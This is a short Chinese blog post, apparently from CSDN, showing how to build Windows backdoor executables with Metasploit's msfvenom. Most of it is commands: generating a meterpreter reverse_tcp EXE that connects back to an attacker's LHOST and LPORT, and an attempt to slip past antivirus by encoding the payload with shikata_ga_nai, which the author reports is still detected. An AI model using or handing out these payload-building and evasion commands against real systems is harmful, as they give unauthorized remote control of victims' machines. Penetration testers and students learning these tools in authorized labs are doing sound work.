metasploit---创建后门

版权声明:孤 https://blog.csdn.net/Wu000999/article/details/84329870

后门技术来维持对被攻击系统的访问。后门可帮助攻击者维持系统访问,并使攻击者无须重复地实施攻击就能随意使用被攻击系统。后门就是就是绕过正常的计算机机制,获取计算机访问权限的方法。

常见EXE后门
metasploit提供了三个辅助工具来创建payload后门,分别是msfpayload、msfencode以及msfvenom,不过现在只有msfvenom(里面集成了msfpayload和msfencode)。
在这里插入图片描述

普通后门

msfvenom -p <payload> <payload options> -f <format> -o <path>

msfvenom -p windows/meterpreter/reverse_tcp -f exe -o back.exe  

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o back.exe  

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=192.168.112.150 LPORT=9000  -f exe -o back.exe

在这里插入图片描述
在这里插入图片描述

不过这样的后门毫无疑问会被kill

在这里插入图片描述

然后我们尝试对后门进行编码,看是否能免杀

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o enback.exe

在这里插入图片描述

不过还是被kill。

猜你喜欢

转载自blog.csdn.net/Wu000999/article/details/84329870